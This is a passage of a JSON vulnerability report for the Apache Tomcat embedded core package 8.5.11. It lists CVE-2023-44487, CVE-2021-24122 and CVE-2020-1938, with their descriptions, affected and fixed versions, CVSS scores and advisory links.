List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4"},{"summary":"W3 Mailing List","url":"https://lists.w3.org/Archives/Public/ietf-http-wg/2023OctDec/0025.html"},{"summary":"Nginx Mailing List","url":"https://mailman.nginx.org/pipermail/nginx-devel/2023-October/S36Q5HBXR7CAIMPLLPRSSSYR4PCMWILK.html"},{"summary":"Microsoft Advisory 2","url":"https://msrc.microsoft.com/blog/2023/10/microsoft-response-to-distributed-denial-of-service-ddos-attacks-against-http/2"},{"summary":"CVE Record","url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-44487"},{"summary":"F5 Advisory K000137106","url":"https://my.f5.com/manage/s/article/K000137106"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44487"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44487"},{"summary":"Openssf Advisory http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response","url":"https://openssf.org/blog/2023/10/10/http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response"},{"summary":"Seanmonstar Advisory hyper-http2-rapid-reset-unaffected","url":"https://seanmonstar.com/post/730794151136935936/hyper-http2-rapid-reset-unaffected"},{"summary":"Gentoo Advisory glsa-202311-09","url":"https://security.gentoo.org/glsa/202311-09"},{"summary":"NetApp Advisory ntap-20231016-0001","url":"https://security.netapp.com/advisory/ntap-20231016-0001"},{"summary":"NetApp Advisory ntap-20240426-0007","url":"https://security.netapp.com/advisory/ntap-20240426-0007"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"NetApp Advisory ntap-20240621-0007","url":"https://security.netapp.com/advisory/ntap-20240621-0007"},{"summary":"Cve 2023","url":"https://security.paloaltonetworks.com/CVE-2023-44487"},{"summary":"CVE Record","url":"https://ubuntu.com/security/CVE-2023-44487"},{"summary":"Bleepingcomputer Advisory new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records","url":"https://www.bleepingcomputer.com/news/security/new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records"},{"summary":"Cve 2023","url":"https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487"},{"summary":"Darkreading Advisory internet-wide-zero-day-bug-fuels-largest-ever-ddos-event","url":"https://www.darkreading.com/cloud/internet-wide-zero-day-bug-fuels-largest-ever-ddos-event"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"},{"summary":"Debian Advisory dsa-5540","url":"https://www.debian.org/security/2023/dsa-5540"},{"summary":"Debian Advisory dsa-5549","url":"https://www.debian.org/security/2023/dsa-5549"},{"summary":"Debian Advisory dsa-5558","url":"https://www.debian.org/security/2023/dsa-5558"},{"summary":"Debian Advisory dsa-5570","url":"https://www.debian.org/security/2023/dsa-5570"},{"summary":"Eclipse Advisory msg00181","url":"https://www.eclipse.org/lists/jetty-announce/msg00181.html"},{"summary":"Haproxy Advisory haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487","url":"https://www.haproxy.com/blog/haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487"},{"summary":"Netlify Advisory netlify-successfully-mitigates-cve-2023-44487","url":"https://www.netlify.com/blog/netlify-successfully-mitigates-cve-2023-44487"},{"summary":"Nginx Advisory http-2-rapid-reset-attack-impacting-f5-nginx-products","url":"https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2023/10/10/6"},{"summary":"Phoronix Advisory HTTP2-Rapid-Reset-Attack","url":"https://www.phoronix.com/news/HTTP2-Rapid-Reset-Attack"},{"summary":"Theregister Advisory http2_rapid_reset_zeroday","url":"https://www.theregister.com/2023/10/10/http2_rapid_reset_zeroday"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-44487/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-24122"]}],"cve":"CVE-2021-24122","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2021-05-13T22:30:02","ids":[{"system_name":"CVE Record","text":"CVE-2021-24122"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"NetApp Advisory","text":"ntap-20210212-0008"}],"notes":[{"audience":"developers","category":"other","text":"Use of Incorrectly-Resolved Name or Reference","title":"Additional CWE: 706"},{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Apache Tomcat When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.  ## Related CVE(s) BIT-tomcat-2021-24122, CVE-2021-24122"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.60"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.60"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/01/14/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7382e1e35b9bc7c8f320b90ad77e74c13172d08034e20c18000fe710@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r776c64337495bf28b7d5597268114a888e3fad6045c40a0da0c66d4d@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e0bb9ea415724550e2b325e143b23e269579e54d66fcd7754bd0c20@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb32a73b7cb919d4f44a2596b6b951274c0004fc8b0e393d6829a45f9@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rca833c6d42b7b9ce1563488c0929f29fcc95947d86e5e740258c8937@%3Cdev.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-24122"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-24122"},{"summary":"NetApp Advisory ntap-20210212-0008","url":"https://security.netapp.com/advisory/ntap-20210212-0008"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.60"]}],"title":"CVE-2021-24122/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1938"]}],"cve":"CVE-2020-1938","cwe":{"id":"269","name":"Improper Privilege Management"},"discovery_date":"2020-06-15T18:51:21","ids":[{"system_name":"CVE Record","text":"CVE-2020-1938"},{"system_name":"Blackberry Advisory","text":"articleDetail"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Debian Advisory","text":"dsa-4673"},{"system_name":"Debian Advisory","text":"dsa-4680"},{"system_name":"Gentoo Advisory","text":"glsa-202003-43"},{"system_name":"NetApp Advisory","text":"ntap-20200226-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Privilege Management in Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Improper Privilege Management in Tomcat When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: returning arbitrary files from anywhere in the web application, processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.  ## Related CVE(s) BIT-tomcat-2020-1938, CVE-2020-1938"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.51"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html"},{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html"},{"summary":"Blackberry Advisory articleDetail","url":"http://support.blackberry.com/kb/articleDetail?articleNumber=000062739"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a%40%3Cusers.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7%40%3Ccommits.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca%40%3Cbugs.httpd.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.httpd.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1938"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1938"},{"summary":"Gentoo Advisory glsa-202003-43","url":"https://security.gentoo.org/glsa/202003-43"},{"summary":"NetApp Advisory ntap-20200226-0002","url":"https://security.netapp.com/advisory/ntap-20200226-0002"},{"summary":"Debian Advisory dsa-4673","url":"https://www.debian.org/security/2020/dsa-4673"},{"summary":"Debian Advisory dsa-4680","url":"https://www.debian.org/security/2020/dsa-4680"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory 